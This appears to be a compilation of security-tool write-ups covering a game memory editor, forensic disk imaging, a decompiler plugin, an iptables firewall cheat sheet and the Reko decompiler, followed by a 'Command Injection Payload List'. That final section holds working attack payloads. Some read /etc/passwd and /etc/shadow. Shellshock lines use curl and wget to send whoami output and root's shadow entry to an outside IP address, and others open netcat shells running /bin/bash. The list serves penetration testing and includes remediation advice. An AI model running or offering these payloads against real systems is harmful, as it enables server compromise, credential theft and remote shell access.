
Cheat Engine - A Development Environment Focused On Modding


Cheat Engine is an open source tool designed to help you modify single-player games running under Windows, so you can make them harder or easier depending on your preference (e.g. if you find that 100 HP is too easy, try playing a game with a max of 1 HP). It also contains other useful tools to help with debugging games and even normal applications, and it helps you protect your system by letting you inspect memory modifications made by backdoors, and even offers some ways to unhide them from conventional means.

It comes with a memory scanner to quickly scan for variables used within a game and allows you to change them; it also comes with a debugger, disassembler, assembler, speedhack, trainer maker, Direct3D manipulation tools, system inspection tools and more.

Besides these tools, it also comes with extensive scripting support, which allows experienced developers to create their own applications with ease and share them with other people.

For new users it is recommended to go through the tutorial (the one that comes with Cheat Engine; you can find it in your programs list after installing) and at least reach step 5 for a basic understanding of how Cheat Engine is used.


OSFClone - Open Source Utility To Create And Clone Forensic Disk Images


OSFClone is a free, self-booting solution which enables you to create or clone exact raw disk images quickly, independently of the installed operating system. In addition to raw disk images, OSFClone also supports imaging drives to the open Advanced Forensics Format (AFF), an open and extensible format for storing disk images and associated metadata, and to the Expert Witness Compression Format (EWF). An open standard enables investigators to quickly and efficiently use their preferred tools for drive analysis. After creating or cloning a disk image, you can mount the image with PassMark OSFMount before conducting analysis with PassMark OSForensics™.


OSFClone creates a forensic image of a disk, preserving any unused sectors, slack space, file fragmentation and undeleted file records from the original hard disk. Boot into OSFClone and create disk clones of FAT, NTFS and USB-connected drives! OSFClone can be booted from CD/DVD drives, or from USB flash drives.

OSFClone can create disk images in the dc3dd format. The dc3dd format is ideal for computer forensics due to its increased level of reporting for progress and errors, and ability to hash files on-the-fly.
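For orientation, an equivalent dc3dd run outside of OSFClone looks roughly like this (a sketch only: the device and file names are hypothetical, and the available options depend on your dc3dd version):
dc3dd if=/dev/sdb of=evidence01.dd hash=sha1 log=evidence01.log    # image the drive, hash on-the-fly, log progress and errors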

Verify that a disk clone is identical to the source drive, by using OSFClone to compare the MD5 or SHA1 hash between the clone and the source drive. After image creation, you can choose from a range of compression options to reduce the size of the newly created image, increasing portability and saving disk space.
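The same comparison can be repeated by hand on a Linux system, as a minimal sketch (device and image names are hypothetical; the digests must match for the clone to be considered identical):
md5sum /dev/sdb evidence01.dd
sha1sum /dev/sdb evidence01.dd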


Use OSFClone to save forensic meta-data (such as case number, evidence number, examiner name, description and checksum) for cloned or created images.


PHP Security Check List


PHP (PHP: Hypertext Preprocessor) is a server-side, general-purpose scripting and programming language, widely used on the web, that can be embedded in HTML. PHP was first created by Rasmus Lerdorf in 1995, and its development is now run by the PHP community.

The PHP programming language is still used by a large number of developers and is one of the best-known backend programming languages. This list, called the "PHP security check list", covers the security issues in PHP web applications that security researchers should know.


HexRaysCodeXplorer - Hex-Rays Decompiler Plugin For Better Code Navigation

The Hex-Rays Decompiler plugin for better code navigation in the RE process. CodeXplorer automates code REconstruction of C++ applications or modern malware like Stuxnet, Flame, Equation, Animal Farm ...
The CodeXplorer plugin is one of the first publicly available Hex-Rays Decompiler plugins. We have kept this project updated since the summer of 2013 and continue to contribute new features frequently. The most interesting features of CodeXplorer have also been presented at numerous security conferences such as REcon, ZeroNights, H2HC, NSEC and BHUS.

Contributors:
Alex Matrosov (@matrosov)
Eugene Rodionov (@rodionov)
Rodrigo Branco (@rrbranco)
Gabriel Barbosa (@gabrielnb)

Supported versions of Hex-Rays products: we always focus on the latest versions of IDA and the Decompiler, because we try to use the interesting new features of the latest SDK releases. This also means we only test against the latest versions of Hex-Rays products, and stable operation on previous versions is not guaranteed.

Why not IDAPython: all the code is developed in C/C++, because that is a more stable way to maintain a complex plugin for the Hex-Rays Decompiler.

Supported Platforms: x86/x64 for Win, Linux and Mac.

HexRaysCodeXplorer - a Hex-Rays Decompiler plugin for easier code navigation. The right-click context menu in the Pseudocode window shows the CodeXplorer plugin commands:


Here are the main features of the CodeXplorer plugin:
  • Automatic type REconstruction for C++ objects. To reconstruct a type using HexRaysCodeXplorer, select the variable holding a pointer to the object instance (or to position-independent code), right-click, and choose the «REconstruct Type» option from the context menu:

The reconstructed structure is displayed in the “Output window”. Detailed information about the type reconstruction feature is provided in the blog post “Type REconstruction in HexRaysCodeXplorer”.
The CodeXplorer plugin also supports automatic reconstruction of types into the IDA local types storage.


  • Virtual function table identification - automatically identifies references to virtual function tables during type reconstruction. When a reference to a virtual function table is identified, the plugin generates a corresponding C-structure. As shown below, while reconstructing struct_local_data_storage two virtual function tables were identified and, as a result, two corresponding structures were generated: struct_local_data_storage_VTABLE_0 and struct_local_data_storage_VTABLE_4.

  • C-tree graph visualization - a special tree-like structure representing a decompiled routine in citem_t terms (hexrays.hpp). A useful feature for understanding how the decompiler works. The highlighted graph node corresponds to the current cursor position in the Hex-Rays Pseudocode window:


  • Ctree Item View - shows the ctree representation of the highlighted element:


  • Extract Ctrees to File - calculates SHA1 hashes and dumps all ctrees to a file.


  • Extract Types to File - dumps all type information (including reconstructed types) into a file.
  • Navigation through virtual function calls in the Hex-Rays Pseudocode window. After C++ objects are represented by C-structures, this feature makes it possible to navigate to virtual function calls (shown as structure fields) by mouse click:


  • Jump to Disasm - a small feature for navigating to the assembly code in the "IDA View" window from the current Pseudocode line position. It helps to find the place in the assembly code associated with the decompiled line.


  • Object Explorer - a useful interface for navigating through virtual table (VTBL) structures. Object Explorer outputs VTBL information into an IDA custom view window. The output window is shown by choosing the «Object Explorer» option in the right-click context menu:


Object Explorer supports the following features:
  • Automatic structure generation for VTBLs into IDA local types
  • Navigation in the virtual table list and jumping to the VTBL address in the "IDA View" window by click
  • Shows hints for the current position in the virtual table list
  • Shows the cross-references list via the "Show XREFS to VTBL" menu option


  • Supports automatic parsing of RTTI objects:

Batch mode provides the following:
  • Batch mode - a useful feature for using CodeXplorer to process multiple files without any user interaction. We added this feature after our Black Hat research in 2015, for processing 2 million samples.
Example (dump types and ctrees for functions with the name prefix "crypto_"):
idaq.exe -OHexRaysCodeXplorer:dump_types:dump_ctrees:CRYPTOcrypto_path_to_idb
Compiling:
Windows:
  • Open the solution in Visual Studio
  • Open the file src/HexRaysCodeXplorer/PropertySheet.props in Notepad(++) and update the values of the IDADIR and IDASDK paths to point to the IDA installation path and the IDA 7 SDK path accordingly. The Hex-Rays SDK should be in $IDADIR\plugins\hexrays_sdk (as it is by default)
  • Build Release | x64 and Release x64 | x64 configurations
Linux:
  • cd src/HexRaysCodeXplorer/
  • IDA_DIR=<PATH_TO_IDA> IDA_SDK=<PATH_TO_IDA_SDK> EA64=0 make -f makefile.lnx
Mac:
  • cd src/HexRaysCodeXplorer/
  • IDA_DIR=<PATH_TO_IDA> IDA_SDK=<PATH_TO_IDA_SDK> make -f makefile.mac
  • The Mac makefile might need some hand editing, pull requests welcome!
  • IDA 7.0 .pmc file extension should be .dylib
  • bash$ export IDA_DIR="/Applications/IDA\ Pro\ 7.0/ida.app/Contents/MacOS" && export IDA_SDK="/Applications/IDA\ Pro\ 7.0/ida.app/Contents/MacOS/idasdk" && make -f makefile7.mac
  • Or open project in Xcode HexRaysCodeXplorer.xcodeproj

Conference talks about CodeXplorer plugin:
  • 2015
  • "Distributing the REconstruction of High-Level IR for Large Scale Malware Analysis", BHUS [slides]
  • "Object Oriented Code RE with HexraysCodeXplorer", NSEC [slides]
  • 2014
  • "HexRaysCodeXplorer: object oriented RE for fun and profit", H2HC [slides]
  • 2013
  • "HexRaysCodeXplorer: make object-oriented RE easier", ZeroNights [slides]
  • "Reconstructing Gapz: Position-Independent Code Analysis Problem", REcon [slides]


Iptables Essentials - Common Firewall Rules And Commands

Tools to help you configure Iptables
  Shorewall - advanced gateway/firewall configuration tool for GNU/Linux.
  Firewalld - provides a dynamically managed firewall.
  UFW - default firewall configuration tool for Ubuntu.
  FireHOL - offers simple and powerful configuration for all Linux firewall and traffic shaping requirements.

Manuals/Howtos/Tutorials
  Best practices: iptables - by Major Hayden
  An In-Depth Guide to Iptables, the Linux Firewall
  Advanced Features of netfilter/iptables
  Linux Firewalls Using iptables
  Debugging iptables and common firewall pitfalls?
  Netfilter Hacking HOWTO
  Per-IP rate limiting with iptables

How does it work?


Iptables Rules

Saving Rules

Debian Based
netfilter-persistent save

RedHat Based
service iptables save
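Both of the wrappers above are essentially front ends to iptables-save/iptables-restore, which you can also call directly (a minimal sketch; the paths are only the conventional defaults for each family):
iptables-save > /etc/iptables/rules.v4        # Debian/Ubuntu convention
iptables-save > /etc/sysconfig/iptables       # RHEL/CentOS convention
iptables-restore < /etc/iptables/rules.v4     # reload the saved rules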

List out all of the active iptables rules with verbose
iptables -n -L -v

List out all of the active iptables rules with numeric lines and verbose
iptables -n -L -v --line-numbers

Print out all of the active iptables rules
iptables -S

List Rules as Tables for INPUT chain
iptables -L INPUT

Print all of the rule specifications in the INPUT chain
iptables -S INPUT

Show Packet Counts and Aggregate Size
iptables -L INPUT -v

To display INPUT or OUTPUT chain rules with numeric lines and verbose
iptables -L INPUT -n -v
iptables -L OUTPUT -n -v --line-numbers

Delete Rule by Chain and Number
iptables -D INPUT 10

Delete Rule by Specification
iptables -D INPUT -m conntrack --ctstate INVALID -j DROP

Flush All Rules, Delete All Chains, and Accept All
iptables -P INPUT ACCEPT
iptables -P FORWARD ACCEPT
iptables -P OUTPUT ACCEPT

iptables -t nat -F
iptables -t mangle -F
iptables -F
iptables -X

Flush All Chains
iptables -F

Flush a Single Chain
iptables -F INPUT

Insert Firewall Rules
iptables -I INPUT 2 -s 202.54.1.2 -j DROP

Allow Loopback Connections
iptables -A INPUT -i lo -j ACCEPT
iptables -A OUTPUT -o lo -j ACCEPT

Allow Established and Related Incoming Connections
iptables -A INPUT -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT

Allow Established Outgoing Connections
iptables -A OUTPUT -m conntrack --ctstate ESTABLISHED -j ACCEPT

Internal to External
iptables -A FORWARD -i eth1 -o eth0 -j ACCEPT

Drop Invalid Packets
iptables -A INPUT -m conntrack --ctstate INVALID -j DROP

Block an IP Address
iptables -A INPUT -s 192.168.252.10 -j DROP

Block an IP Address and Reject
iptables -A INPUT -s 192.168.252.10 -j REJECT

Block Connections to a Network Interface
iptables -A INPUT -i eth0 -s 192.168.252.10 -j DROP

Allow All Incoming SSH
iptables -A INPUT -p tcp --dport 22 -m conntrack --ctstate NEW,ESTABLISHED -j ACCEPT
iptables -A OUTPUT -p tcp --sport 22 -m conntrack --ctstate ESTABLISHED -j ACCEPT

Allow Incoming SSH from Specific IP address or subnet
iptables -A INPUT -p tcp -s 192.168.240.0/24 --dport 22 -m conntrack --ctstate NEW,ESTABLISHED -j ACCEPT
iptables -A OUTPUT -p tcp --sport 22 -m conntrack --ctstate ESTABLISHED -j ACCEPT

Allow Outgoing SSH
iptables -A OUTPUT -p tcp --dport 22 -m conntrack --ctstate NEW,ESTABLISHED -j ACCEPT
iptables -A INPUT -p tcp --sport 22 -m conntrack --ctstate ESTABLISHED -j ACCEPT

Allow Incoming Rsync from Specific IP Address or Subnet
iptables -A INPUT -p tcp -s 192.168.240.0/24 --dport 873 -m conntrack --ctstate NEW,ESTABLISHED -j ACCEPT
iptables -A OUTPUT -p tcp --sport 873 -m conntrack --ctstate ESTABLISHED -j ACCEPT

Allow All Incoming HTTP
iptables -A INPUT -p tcp --dport 80 -m conntrack --ctstate NEW,ESTABLISHED -j ACCEPT
iptables -A OUTPUT -p tcp --sport 80 -m conntrack --ctstate ESTABLISHED -j ACCEPT

Allow All Incoming HTTPS
iptables -A INPUT -p tcp --dport 443 -m conntrack --ctstate NEW,ESTABLISHED -j ACCEPT
iptables -A OUTPUT -p tcp --sport 443 -m conntrack --ctstate ESTABLISHED -j ACCEPT

Allow All Incoming HTTP and HTTPS
iptables -A INPUT -p tcp -m multiport --dports 80,443 -m conntrack --ctstate NEW,ESTABLISHED -j ACCEPT
iptables -A OUTPUT -p tcp -m multiport --dports 80,443 -m conntrack --ctstate ESTABLISHED -j ACCEPT

Allow MySQL from Specific IP Address or Subnet
iptables -A INPUT -p tcp -s 192.168.240.0/24 --dport 3306 -m conntrack --ctstate NEW,ESTABLISHED -j ACCEPT
iptables -A OUTPUT -p tcp --sport 3306 -m conntrack --ctstate ESTABLISHED -j ACCEPT

Allow MySQL to Specific Network Interface
iptables -A INPUT -i eth1 -p tcp --dport 3306 -m conntrack --ctstate NEW,ESTABLISHED -j ACCEPT
iptables -A OUTPUT -o eth1 -p tcp --sport 3306 -m conntrack --ctstate ESTABLISHED -j ACCEPT

Allow PostgreSQL from Specific IP Address or Subnet
iptables -A INPUT -p tcp -s 192.168.240.0/24 --dport 5432 -m conntrack --ctstate NEW,ESTABLISHED -j ACCEPT
iptables -A OUTPUT -p tcp --sport 5432 -m conntrack --ctstate ESTABLISHED -j ACCEPT

Allow PostgreSQL to Specific Network Interface
iptables -A INPUT -i eth1 -p tcp --dport 5432 -m conntrack --ctstate NEW,ESTABLISHED -j ACCEPT
iptables -A OUTPUT -o eth1 -p tcp --sport 5432 -m conntrack --ctstate ESTABLISHED -j ACCEPT

Block Outgoing SMTP Mail
iptables -A OUTPUT -p tcp --dport 25 -j REJECT

Allow All Incoming SMTP
iptables -A INPUT -p tcp --dport 25 -m conntrack --ctstate NEW,ESTABLISHED -j ACCEPT
iptables -A OUTPUT -p tcp --sport 25 -m conntrack --ctstate ESTABLISHED -j ACCEPT

Allow All Incoming IMAP
iptables -A INPUT -p tcp --dport 143 -m conntrack --ctstate NEW,ESTABLISHED -j ACCEPT
iptables -A OUTPUT -p tcp --sport 143 -m conntrack --ctstate ESTABLISHED -j ACCEPT

Allow All Incoming IMAPS
iptables -A INPUT -p tcp --dport 993 -m conntrack --ctstate NEW,ESTABLISHED -j ACCEPT
iptables -A OUTPUT -p tcp --sport 993 -m conntrack --ctstate ESTABLISHED -j ACCEPT

Allow All Incoming POP3
iptables -A INPUT -p tcp --dport 110 -m conntrack --ctstate NEW,ESTABLISHED -j ACCEPT
iptables -A OUTPUT -p tcp --sport 110 -m conntrack --ctstate ESTABLISHED -j ACCEPT

Allow All Incoming POP3S
iptables -A INPUT -p tcp --dport 995 -m conntrack --ctstate NEW,ESTABLISHED -j ACCEPT
iptables -A OUTPUT -p tcp --sport 995 -m conntrack --ctstate ESTABLISHED -j ACCEPT

Drop Private Network Address On Public Interface
iptables -A INPUT -i eth1 -s 192.168.0.0/24 -j DROP
iptables -A INPUT -i eth1 -s 10.0.0.0/8 -j DROP

Drop All Outgoing to Facebook Networks
Get Facebook AS:
whois -h v4.whois.cymru.com " -v $(host facebook.com | grep "has address" | cut -d " " -f4)" | tail -n1 | awk '{print $1}'
Drop:
for i in $(whois -h whois.radb.net -- '-i origin AS32934' | grep "^route:" | cut -d ":" -f2 | sed -e 's/^[ \t]*//' | sort -n -t . -k 1,1 -k 2,2 -k 3,3 -k 4,4) ; do

iptables -A OUTPUT -s "$i" -j REJECT

done

Log and Drop Packets
iptables -A INPUT -i eth1 -s 10.0.0.0/8 -j LOG --log-prefix "IP_SPOOF A: "
iptables -A INPUT -i eth1 -s 10.0.0.0/8 -j DROP
By default everything is logged to /var/log/messages file:
tail -f /var/log/messages
grep --color 'IP_SPOOF' /var/log/messages

Log and Drop Packets with Limited Number of Log Entries
iptables -A INPUT -i eth1 -s 10.0.0.0/8 -m limit --limit 5/m --limit-burst 7 -j LOG --log-prefix "IP_SPOOF A: "
iptables -A INPUT -i eth1 -s 10.0.0.0/8 -j DROP

Drop or Accept Traffic From Mac Address
iptables -A INPUT -m mac --mac-source 00:0F:EA:91:04:08 -j DROP
iptables -A INPUT -p tcp --destination-port 22 -m mac --mac-source 00:0F:EA:91:04:07 -j ACCEPT

Block or Allow ICMP Ping Request
iptables -A INPUT -p icmp --icmp-type echo-request -j DROP
iptables -A INPUT -i eth1 -p icmp --icmp-type echo-request -j DROP

Specifying Multiple Ports with multiport
iptables -A INPUT -i eth0 -p tcp -m state --state NEW -m multiport --dports ssh,smtp,http,https -j ACCEPT

Load Balancing with random* or nth*
_ips=("172.31.250.10" "172.31.250.11" "172.31.250.12" "172.31.250.13")

for ip in "${_ips[@]}" ; do
iptables -A PREROUTING -i eth0 -p tcp --dport 80 -m state --state NEW -m nth --counter 0 --every 4 --packet 0 \
-j DNAT --to-destination ${ip}:80
done
or
_ips=("172.31.250.10" "172.31.250.11" "172.31.250.12" "172.31.250.13")

for ip in "${_ips[@]}" ; do
iptables -A PREROUTING -i eth0 -p tcp --dport 80 -m state --state NEW -m random --average 25 \
-j DNAT --to-destination ${ip}:80
done

Restricting the Number of Connections with limit and iplimit*
iptables -A FORWARD -m state --state NEW -p tcp -m multiport --dport http,https -o eth0 -i eth1 \
-m limit --limit 20/hour --limit-burst 5 -j ACCEPT
or
iptables -A INPUT -p tcp -m state --state NEW --dport http -m iplimit --iplimit-above 5 -j DROP

Maintaining a List of recent Connections to Match Against
iptables -A FORWARD -m recent --name portscan --rcheck --seconds 100 -j DROP
iptables -A FORWARD -p tcp -i eth0 --dport 443 -m recent --name portscan --set -j DROP

Matching Against a string* in a Packet's Data Payload
iptables -A FORWARD -m string --string '.com' -j DROP
iptables -A FORWARD -m string --string '.exe' -j DROP

Time-based Rules with time*
iptables -A FORWARD -p tcp -m multiport --dport http,https -o eth0 -i eth1 \
-m time --timestart 21:30 --timestop 22:30 --days Mon,Tue,Wed,Thu,Fri -j ACCEPT

Packet Matching Based on TTL Values
iptables -A INPUT -s 1.2.3.4 -m ttl --ttl-lt 40 -j REJECT

Protection against port scanning
iptables -N port-scanning
iptables -A port-scanning -p tcp --tcp-flags SYN,ACK,FIN,RST RST -m limit --limit 1/s --limit-burst 2 -j RETURN
iptables -A port-scanning -j DROP

SSH brute-force protection
iptables -A INPUT -p tcp --dport ssh -m conntrack --ctstate NEW -m recent --set
iptables -A INPUT -p tcp --dport ssh -m conntrack --ctstate NEW -m recent --update --seconds 60 --hitcount 10 -j DROP
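The recent match keeps its tracked addresses in procfs, so you can inspect the list that these rules build (a sketch; since no --name is given above, the kernel uses the default list name DEFAULT under /proc/net/xt_recent/ on modern kernels):
cat /proc/net/xt_recent/DEFAULT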

Syn-flood protection
iptables -N syn_flood

iptables -A INPUT -p tcp --syn -j syn_flood
iptables -A syn_flood -m limit --limit 1/s --limit-burst 3 -j RETURN
iptables -A syn_flood -j DROP

iptables -A INPUT -p icmp -m limit --limit 1/s --limit-burst 1 -j ACCEPT

iptables -A INPUT -p icmp -m limit --limit 1/s --limit-burst 1 -j LOG --log-prefix PING-DROP:
iptables -A INPUT -p icmp -j DROP

iptables -A OUTPUT -p icmp -j ACCEPT

Mitigating SYN Floods With SYNPROXY
iptables -t raw -A PREROUTING -p tcp -m tcp --syn -j CT --notrack
iptables -A INPUT -p tcp -m tcp -m conntrack --ctstate INVALID,UNTRACKED -j SYNPROXY --sack-perm --timestamp --wscale 7 --mss 1460
iptables -A INPUT -m conntrack --ctstate INVALID -j DROP

Block New Packets That Are Not SYN
iptables -A INPUT -p tcp ! --syn -m state --state NEW -j DROP
or
iptables -t mangle -A PREROUTING -p tcp ! --syn -m conntrack --ctstate NEW -j DROP

Force Fragments packets check
iptables -A INPUT -f -j DROP

XMAS packets
iptables -A INPUT -p tcp --tcp-flags ALL ALL -j DROP

Drop all NULL packets
iptables -A INPUT -p tcp --tcp-flags ALL NONE -j DROP

Block Uncommon MSS Values
iptables -t mangle -A PREROUTING -p tcp -m conntrack --ctstate NEW -m tcpmss ! --mss 536:65535 -j DROP

Block Packets With Bogus TCP Flags
iptables -t mangle -A PREROUTING -p tcp --tcp-flags FIN,SYN,RST,PSH,ACK,URG NONE -j DROP
iptables -t mangle -A PREROUTING -p tcp --tcp-flags FIN,SYN FIN,SYN -j DROP
iptables -t mangle -A PREROUTING -p tcp --tcp-flags SYN,RST SYN,RST -j DROP
iptables -t mangle -A PREROUTING -p tcp --tcp-flags FIN,RST FIN,RST -j DROP
iptables -t mangle -A PREROUTING -p tcp --tcp-flags FIN,ACK FIN -j DROP
iptables -t mangle -A PREROUTING -p tcp --tcp-flags ACK,URG URG -j DROP
iptables -t mangle -A PREROUTING -p tcp --tcp-flags ACK,FIN FIN -j DROP
iptables -t mangle -A PREROUTING -p tcp --tcp-flags ACK,PSH PSH -j DROP
iptables -t mangle -A PREROUTING -p tcp --tcp-flags ALL ALL -j DROP
iptables -t mangle -A PREROUTING -p tcp --tcp-flags ALL NONE -j DROP
iptables -t mangle -A PREROUTING -p tcp --tcp-flags ALL FIN,PSH,URG -j DROP
iptables -t mangle -A PREROUTING -p tcp --tcp-flags ALL SYN,FIN,PSH,URG -j DROP
iptables -t mangle -A PREROUTING -p tcp --tcp-flags ALL SYN,RST,ACK,FIN,URG -j DROP

Block Packets From Private Subnets (Spoofing)
_subnets=("224.0.0.0/3" "169.254.0.0/16" "172.16.0.0/12" "192.0.2.0/24" "192.168.0.0/16" "10.0.0.0/8" "0.0.0.0/8" "240.0.0.0/5")

for _sub in "${_subnets[@]}" ; do
iptables -t mangle -A PREROUTING -s "$_sub" -j DROP
done
iptables -t mangle -A PREROUTING -s 127.0.0.0/8 ! -i lo -j DROP


Reko - A General Purpose Binary Decompiler


Reko (Swedish: "decent, obliging") is a C# project containing a decompiler for machine code binaries. This project is freely available under the GNU General Public License.
The project consists of front ends, a core decompiler engine, and back ends to help it achieve its goals. A command-line front end, a Windows GUI, and an ASP.NET front end exist at the time of writing. The decompiler engine receives inputs from the front ends in the form of either individual executable files or decompiler project files. Reko project files contain additional information about a binary file, helpful to the decompilation process or for formatting the output. The decompiler engine then proceeds to analyze the input binary.
Reko has the ambition of supporting decompilation of various processor architectures and executable file formats with minimal user intervention. For a complete list, see the supported binaries page.
Please note that many software licenses prohibit decompilation or other reverse engineering of their machine code binaries. Use this decompiler only if you have legal rights to decompile the binary (for instance if the binary is your own.)

Downloading Reko
Official releases are published every few months on Github and SourceForge. Users who can't or won't build Reko themselves can download the output of the AppVeyor integration builder. Naturally you can build the project from the sources: see "Hacking" below.

Installing Reko

Windows users
The following prerequisite software must be installed on your machine first:
Download an MSI file from one of the places mentioned above, then simply run the installer.

Non-Windows users
The following prerequisite software must be installed on your machine first:
Note: we've been unable to test Reko with the most recent version of mono, 5.16.0, because a bug in said version makes it impossible to build. This has been reported in mono/mono#11663.
After installing mono, you can proceed by either downloading binaries directly from the integration build server, or by building Reko from sources (see Hacking below).

Documentation
To get acquainted with Reko's various features, you can read the user's guide. If you're interested in the internal workings of the project, see the wiki.

Getting support
You can report any issues you encounter or ask any Reko-related question on the issue tracker. You can also try the Reko Gitter.im chatroom. Reko is built by volunteers' efforts on their spare time, so adjust your response-time expectations accordingly.

Hacking
To build reko, start by cloning https://github.com/uxmal/reko. You can use an IDE or the command line to build the solution file Reko-decompiler.sln. If you are an IDE user, use Visual Studio 2017 or later, or MonoDevelop version 5.10 or later. If you wish to build using the command line, use the command
msbuild Reko-decompiler.sln
(provided you have msbuild installed). All external dependencies needed to build Reko are included in the external directory.
Note: please let us know if you still are not able to compile, so we can help you fix the issue.
If you're interested in contributing code, see the road map for areas to explore. The Wiki has more information about the Reko project's internal workings. Please consult the style guide.

Warnings and errors related to WiX
You will receive warnings or errors when loading the solution in Visual Studio or MonoDevelop if you haven't installed the WiX toolset on your development machine. You can safely ignore the warnings; the WiX toolset is only used when making MSI installer packages, and isn't even supported in MonoDevelop. You will not need to build an installer if you're already able to compile the project: the build process copies all the necessary files into the build output directory. If you do want to build an MSI installer with the WiX toolchain, you can download it here: http://wixtoolset.org/releases/

How do I start Reko?
The solution folder Drivers contains the executables that act as user interfaces: the directory WindowsDecompiler contains the GUI client for Windows users; MonoDecompiler contains the GUI client for Mono users; CmdLine is a command line driver.


Command Injection Payload List


Command injection is an attack in which the goal is execution of arbitrary commands on the host operating system via a vulnerable application. Command injection attacks are possible when an application passes unsafe user supplied data (forms, cookies, HTTP headers etc.) to a system shell. In this attack, the attacker-supplied operating system commands are usually executed with the privileges of the vulnerable application. Command injection attacks are possible largely due to insufficient input validation.
This attack differs from Code Injection, in that code injection allows the attacker to add their own code that is then executed by the application. In Command Injection, the attacker extends the default functionality of the application, which executes system commands, without the necessity of injecting code.

What is OS command injection?
OS command Injection is a critical vulnerability that allows attackers to gain complete control over an affected web site and the underlying web server.
OS command injection vulnerabilities arise when an application incorporates user data into an operating system command that it executes. An attacker can manipulate the data to cause their own commands to run. This allows the attacker to carry out any action that the application itself can carry out, including reading or modifying all of its data and performing privileged actions.
In addition to total compromise of the web server itself, an attacker can leverage a command injection vulnerability to pivot the attack in the organization's internal infrastructure, potentially accessing any system which the web server can access. They may also be able to create a persistent foothold within the organization, continuing to access compromised systems even after the original vulnerability has been fixed.

Description :
Operating system command injection vulnerabilities arise when an application incorporates user-controllable data into a command that is processed by a shell command interpreter. If the user data is not strictly validated, an attacker can use shell metacharacters to modify the command that is executed, and inject arbitrary further commands that will be executed by the server.
OS command injection vulnerabilities are usually very serious and may lead to compromise of the server hosting the application, or of the application's own data and functionality. It may also be possible to use the server as a platform for attacks against other systems. The exact potential for exploitation depends upon the security context in which the command is executed, and the privileges that this context has regarding sensitive resources on the server.
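As an illustration of how the payloads listed further below are typically used during testing, a simple time-based probe against a hypothetical vulnerable parameter might look like this (the URL and parameter are made up for the example; a response delayed by roughly ten seconds suggests blind command injection):
time curl -s "http://target.example/ping?host=127.0.0.1;sleep+10"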

Remediation:
If possible, applications should avoid incorporating user-controllable data into operating system commands. In almost every situation, there are safer alternative methods of performing server-level tasks, which cannot be manipulated to perform additional commands than the one intended.
If it is considered unavoidable to incorporate user-supplied data into operating system commands, the following two layers of defense should be used to prevent attacks:
  • The user data should be strictly validated. Ideally, a whitelist of specific accepted values should be used. Otherwise, only short alphanumeric strings should be accepted. Input containing any other data, including any conceivable shell metacharacter or whitespace, should be rejected.
  • The application should use command APIs that launch a specific process via its name and command-line parameters, rather than passing a command string to a shell interpreter that supports command chaining and redirection. For example, the Java API Runtime.exec and the ASP.NET API Process.Start do not support shell metacharacters. This defense can mitigate

Unix :
<!--#exec%20cmd="/bin/cat%20/etc/passwd"-->
<!--#exec%20cmd="/bin/cat%20/etc/shadow"-->
<!--#exec%20cmd="/usr/bin/id;-->
<!--#exec%20cmd="/usr/bin/id;-->
/index.html|id|
;id;
;id
;netstat -a;
;id;
|id
|/usr/bin/id
|id|
|/usr/bin/id|
||/usr/bin/id|
|id;
||/usr/bin/id;
;id|
;|/usr/bin/id|
\n/bin/ls -al\n
\n/usr/bin/id\n
\nid\n
\n/usr/bin/id;
\nid;
\n/usr/bin/id|
\nid|
;/usr/bin/id\n
;id\n
|usr/bin/id\n
|nid\n
`id`
`/usr/bin/id`
a);id
a;id
a);id;
a;id;
a);id|
a;id|
a)|id
a|id
a)|id;
a|id
|/bin/ls -al
a);/usr/bin/id
a;/usr/bin/id
a);/usr/bin/id;
a;/usr/bin/id;
a);/usr/bin/id|
a;/usr/bin/id|
a)|/usr/bin/id
a|/usr/bin/id
a)|/usr/bin/id;
a|/usr/bin/id
;system('cat%20/etc/passwd')
;system('id')
;system('/usr/bin/id')
%0Acat%20/etc/passwd
%0A/usr/bin/id
%0Aid
%0A/usr/bin/id%0A
%0Aid%0A
& ping -i 30 127.0.0.1 &
& ping -n 30 127.0.0.1 &
%0a ping -i 30 127.0.0.1 %0a
`ping 127.0.0.1`
| id
& id
; id
%0a id %0a
`id`
$;/usr/bin/id

Windows :
`
||
|
;
'
'"
"
"'
&
&&
%0a
%0a%0d
%0Acat%20/etc/passwd
%0Aid
%0a id %0a
%0Aid%0A
%0a ping -i 30 127.0.0.1 %0a
%0A/usr/bin/id
%0A/usr/bin/id%0A
%2 -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #' |ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #\" |ping -n 21 127.0.0.1
%20{${phpinfo()}}
%20{${sleep(20)}}
%20{${sleep(3)}}
a|id|
a;id|
a;id;
a;id\n
() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=16?user=\`whoami\`"
() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=18?pwd=\`pwd\`"
() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=20?shadow=\`grep root /etc/shadow\`"
() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=22?uname=\`uname -a\`"
() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=24?shell=\`nc -lvvp 1234 -e /bin/bash\`"
() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=26?shell=\`nc -lvvp 1236 -e /bin/bash &\`"
() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=5"
() { :;}; /bin/bash -c "sleep 1 && curl http://135.23.158.130/.testing/shellshock.txt?sleep=1&?vuln=6"
() { :;}; /bin/bash -c "sleep 1 && echo vulnerable 1"
() { :;}; /bin/bash -c "sleep 3 && curl http://135.23.158.130/.testing/shellshock.txt?sleep=3&?vuln=7"
() { :;}; /bin/bash -c "sleep 3 && echo vulnerable 3"
() { :;}; /bin/bash -c "sleep 6 && curl http://135.23.158.130/.testing/shellshock.txt?sleep=6&?vuln=8"
() { :;}; /bin/bash -c "sleep 6 && curl http://135.23.158.130/.testing/shellshock.txt?sleep=9&?vuln=9"
() { :;}; /bin/bash -c "sleep 6 && echo vulnerable 6"
() { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=17?user=\`whoami\`"
() { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=19?pwd=\`pwd\`"
() { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=21?shadow=\`grep root /etc/shadow\`"
